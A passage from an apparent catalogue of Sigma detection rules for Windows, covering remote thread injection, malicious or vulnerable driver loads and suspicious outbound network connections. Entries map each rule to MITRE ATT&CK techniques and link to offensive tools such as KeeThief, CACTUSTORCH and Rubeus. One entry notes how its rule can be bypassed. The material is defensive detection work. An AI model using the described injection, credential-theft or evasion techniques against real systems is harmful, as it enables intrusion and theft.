Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation In Mstsc.Exe From Suspicious Location"

Table 9811. Table References

Links

https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml

Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation By Uncommon Source Image"

Remote Thread Creation By Uncommon Source Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9812. Table References

Links

https://lolbas-project.github.io

Personal research, statistical analysis[Personal research, statistical analysis]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml

Remote Thread Creation Via PowerShell In Uncommon Target

Detects the creation of a remote thread from a Powershell process in an uncommon target process

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation Via PowerShell In Uncommon Target"

Remote Thread Creation Via PowerShell In Uncommon Target has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9813. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml

Remote Thread Created In KeePass.EXE

Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity

The tag is: misp-galaxy:sigma-rules="Remote Thread Created In KeePass.EXE"

Remote Thread Created In KeePass.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

Table 9814. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa20-259a

https://github.com/GhostPack/KeeThief

https://github.com/denandz/KeeFarce

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml

HackTool - Potential CobaltStrike Process Injection

Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons

The tag is: misp-galaxy:sigma-rules="HackTool - Potential CobaltStrike Process Injection"

HackTool - Potential CobaltStrike Process Injection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

Table 9815. Table References

Links

https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f

https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml

Remote Thread Creation Ttdinject.exe Proxy

Detects a remote thread creation of Ttdinject.exe used as proxy

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation Ttdinject.exe Proxy"

Remote Thread Creation Ttdinject.exe Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 9816. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml

Remote Thread Creation In Uncommon Target Image

Detects uncommon target processes for remote thread creation

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation In Uncommon Target Image"

Remote Thread Creation In Uncommon Target Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"

Table 9817. Table References

Links

https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml

Potential Credential Dumping Attempt Via PowerShell Remote Thread

Detects remote thread creation by PowerShell processes into "lsass.exe"

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Attempt Via PowerShell Remote Thread"

Potential Credential Dumping Attempt Via PowerShell Remote Thread has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9818. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml

HackTool - CACTUSTORCH Remote Thread Creation

Detects remote thread creation from CACTUSTORCH as described in references.

The tag is: misp-galaxy:sigma-rules="HackTool - CACTUSTORCH Remote Thread Creation"

HackTool - CACTUSTORCH Remote Thread Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 9819. Table References

Links

https://twitter.com/SBousseaden/status/1090588499517079552

https://github.com/mdsecactivebreach/CACTUSTORCH

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml

PUA - Process Hacker Driver Load

Detects driver load of the Process Hacker tool

The tag is: misp-galaxy:sigma-rules="PUA - Process Hacker Driver Load"

PUA - Process Hacker Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9820. Table References

Links

https://processhacker.sourceforge.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_process_hacker.yml

Malicious Driver Load By Name

Detects loading of known malicious drivers via the file name of the drivers.

The tag is: misp-galaxy:sigma-rules="Malicious Driver Load By Name"

Malicious Driver Load By Name has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9821. Table References

Links

https://loldrivers.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_drivers_names.yml

Driver Load From A Temporary Directory

Detects a driver load from a temporary directory

The tag is: misp-galaxy:sigma-rules="Driver Load From A Temporary Directory"

Driver Load From A Temporary Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9822. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_susp_temp_use.yml

Vulnerable HackSys Extreme Vulnerable Driver Load

Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors

The tag is: misp-galaxy:sigma-rules="Vulnerable HackSys Extreme Vulnerable Driver Load"

Vulnerable HackSys Extreme Vulnerable Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9823. Table References

Links

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml

PUA - System Informer Driver Load

Detects driver load of the System Informer tool

The tag is: misp-galaxy:sigma-rules="PUA - System Informer Driver Load"

PUA - System Informer Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9824. Table References

Links

https://github.com/winsiderss/systeminformer

https://systeminformer.sourceforge.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_system_informer.yml

Vulnerable Driver Load By Name

Detects the load of known vulnerable drivers via the file name of the drivers.

The tag is: misp-galaxy:sigma-rules="Vulnerable Driver Load By Name"

Vulnerable Driver Load By Name has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9825. Table References

Links

https://loldrivers.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml

Vulnerable WinRing0 Driver Load

Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation

The tag is: misp-galaxy:sigma-rules="Vulnerable WinRing0 Driver Load"

Vulnerable WinRing0 Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9826. Table References

Links

https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/

https://github.com/xmrig/xmrig/tree/master/bin/WinRing0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml

WinDivert Driver Load

Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

The tag is: misp-galaxy:sigma-rules="WinDivert Driver Load"

WinDivert Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 9827. Table References

Links

https://rastamouse.me/ntlm-relaying-via-cobalt-strike/

https://reqrypt.org/windivert-doc.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml

Malicious Driver Load

Detects loading of known malicious drivers via their hash.

The tag is: misp-galaxy:sigma-rules="Malicious Driver Load"

Malicious Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9828. Table References

Links

https://loldrivers.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_drivers.yml

Vulnerable Driver Load

Detects loading of known vulnerable drivers via their hash.

The tag is: misp-galaxy:sigma-rules="Vulnerable Driver Load"

Vulnerable Driver Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9829. Table References

Links

https://loldrivers.io/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml

Network Connection Initiated To Visual Studio Code Tunnels Domain

Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated To Visual Studio Code Tunnels Domain"

Network Connection Initiated To Visual Studio Code Tunnels Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

Table 9830. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://badoption.eu/blog/2023/01/31/code_c2.html

https://cydefops.com/vscode-data-exfiltration

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_vscode_tunnel_connection.yml

Connection Initiated Via Certutil.EXE

Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.

The tag is: misp-galaxy:sigma-rules="Connection Initiated Via Certutil.EXE"

Connection Initiated Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9831. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil_initiated_connection.yml

Network Connection Initiated By AddinUtil.EXE

Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn’t usually initiate network activity.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated By AddinUtil.EXE"

Network Connection Initiated By AddinUtil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9832. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_addinutil.yml

Python Initiated Connection

Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.

The tag is: misp-galaxy:sigma-rules="Python Initiated Connection"

Python Initiated Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 9833. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python

https://pypi.org/project/scapy/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml

Potential Remote PowerShell Session Initiated

Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicates a remote PowerShell connection.

The tag is: misp-galaxy:sigma-rules="Potential Remote PowerShell Session Initiated"

Potential Remote PowerShell Session Initiated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9834. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_remote_powershell_session.yml

Outbound Network Connection To Public IP Via Winlogon

Detects a "winlogon.exe" process that initiate network communications with public IP addresses

The tag is: misp-galaxy:sigma-rules="Outbound Network Connection To Public IP Via Winlogon"

Outbound Network Connection To Public IP Via Winlogon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 9835. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml

Script Initiated Connection to Non-Local Network

Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.

The tag is: misp-galaxy:sigma-rules="Script Initiated Connection to Non-Local Network"

Script Initiated Connection to Non-Local Network has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9836. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml

Suspicious Network Connection Binary No CommandLine

Detects suspicious network connections made by a well-known Windows binary run with no command line parameters

The tag is: misp-galaxy:sigma-rules="Suspicious Network Connection Binary No CommandLine"

Table 9837. Table References

Links

https://redcanary.com/blog/raspberry-robin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml

Potentially Suspicious Wuauclt Network Connection

Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Wuauclt Network Connection"

Potentially Suspicious Wuauclt Network Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9838. Table References

Links

https://dtm.uk/wuauclt/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml

Rundll32 Internet Connection

Detects a rundll32 that communicates with public IP addresses

The tag is: misp-galaxy:sigma-rules="Rundll32 Internet Connection"

Rundll32 Internet Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 9839. Table References

Links

https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml

Office Application Initiated Network Connection Over Uncommon Ports

Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.

The tag is: misp-galaxy:sigma-rules="Office Application Initiated Network Connection Over Uncommon Ports"

Table 9840. Table References

Links

https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_office_uncommon_ports.yml

Network Connection Initiated By Regsvr32.EXE

Detects a network connection initiated by "Regsvr32.exe"

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated By Regsvr32.EXE"

Network Connection Initiated By Regsvr32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 9841. Table References

Links

https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml

Microsoft Sync Center Suspicious Network Connections

Detects suspicious connections from Microsoft Sync Center to non-private IPs.

The tag is: misp-galaxy:sigma-rules="Microsoft Sync Center Suspicious Network Connections"

Microsoft Sync Center Suspicious Network Connections has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9842. Table References

Links

https://redcanary.com/blog/intelligence-insights-november-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml

RDP to HTTP or HTTPS Target Ports

Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443

The tag is: misp-galaxy:sigma-rules="RDP to HTTP or HTTPS Target Ports"

RDP to HTTP or HTTPS Target Ports has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9843. Table References

Links

https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg

https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml

Communication To Uncommon Destination Ports

Detects programs that connect to uncommon destination ports

The tag is: misp-galaxy:sigma-rules="Communication To Uncommon Destination Ports"

Communication To Uncommon Destination Ports has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 9844. Table References

Links

https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml

Suspicious Outbound SMTP Connections

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

The tag is: misp-galaxy:sigma-rules="Suspicious Outbound SMTP Connections"

Suspicious Outbound SMTP Connections has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 9845. Table References

Links

https://www.ietf.org/rfc/rfc2821.txt

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml

Network Communication With Crypto Mining Pool

Detects initiated network connections to crypto mining pools

The tag is: misp-galaxy:sigma-rules="Network Communication With Crypto Mining Pool"

Network Communication With Crypto Mining Pool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

Table 9846. Table References

Links

https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt

https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files

https://www.poolwatch.io/coin/monero

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_crypto_mining_pools.yml

Office Application Initiated Network Connection To Non-Local IP

Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization.

The tag is: misp-galaxy:sigma-rules="Office Application Initiated Network Connection To Non-Local IP"

Office Application Initiated Network Connection To Non-Local IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 9847. Table References

Links

https://corelight.com/blog/detecting-cve-2021-42292

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml

Silenttrinity Stager Msbuild Activity

Detects a possible remote connections to Silenttrinity c2

The tag is: misp-galaxy:sigma-rules="Silenttrinity Stager Msbuild Activity"

Silenttrinity Stager Msbuild Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"

Table 9848. Table References

Links

https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml

Suspicious Epmap Connection

Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC)

The tag is: misp-galaxy:sigma-rules="Suspicious Epmap Connection"

Table 9849. Table References

Links

https://github.com/RiccardoAncarani/TaskShell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml

Outbound RDP Connections Over Non-Standard Tools

Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.

The tag is: misp-galaxy:sigma-rules="Outbound RDP Connections Over Non-Standard Tools"

Outbound RDP Connections Over Non-Standard Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9850. Table References

Links

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml

Suspicious Wordpad Outbound Connections

Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.

The tag is: misp-galaxy:sigma-rules="Suspicious Wordpad Outbound Connections"

Table 9851. Table References

Links

https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wordpad_uncommon_ports.yml

Network Connection Initiated To DevTunnels Domain

Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated To DevTunnels Domain"

Network Connection Initiated To DevTunnels Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

Table 9852. Table References

Links

https://cydefops.com/devtunnels-unleashed

https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security

https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_devtunnel_connection.yml

Script Initiated Connection

Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.

The tag is: misp-galaxy:sigma-rules="Script Initiated Connection"

Script Initiated Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9853. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml

Suspicious Non-Browser Network Communication With Telegram API

Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2

The tag is: misp-galaxy:sigma-rules="Suspicious Non-Browser Network Communication With Telegram API"

Suspicious Non-Browser Network Communication With Telegram API has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 9854. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_telegram_api_non_browser_access.yml

Suspicious Outbound Kerberos Connection

Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.

The tag is: misp-galaxy:sigma-rules="Suspicious Outbound Kerberos Connection"

Suspicious Outbound Kerberos Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 9855. Table References

Links

https://github.com/GhostPack/Rubeus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml

Msiexec.EXE Initiated Network Connection Over HTTP

Detects an initiated network connection by "Msiexec.exe" over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.

The tag is: misp-galaxy:sigma-rules="Msiexec.EXE Initiated Network Connection Over HTTP"

Msiexec.EXE Initiated Network Connection Over HTTP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 9856. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec_http.yml

Suspicious Program Location with Network Connections

Detects programs with network connections running in suspicious files system locations

The tag is: misp-galaxy:sigma-rules="Suspicious Program Location with Network Connections"

Suspicious Program Location with Network Connections has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9857. Table References

Links

https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml

RDP Over Reverse SSH Tunnel

Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389

The tag is: misp-galaxy:sigma-rules="RDP Over Reverse SSH Tunnel"

RDP Over Reverse SSH Tunnel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 9858. Table References

Links

https://twitter.com/cyb3rops/status/1096842275437625346

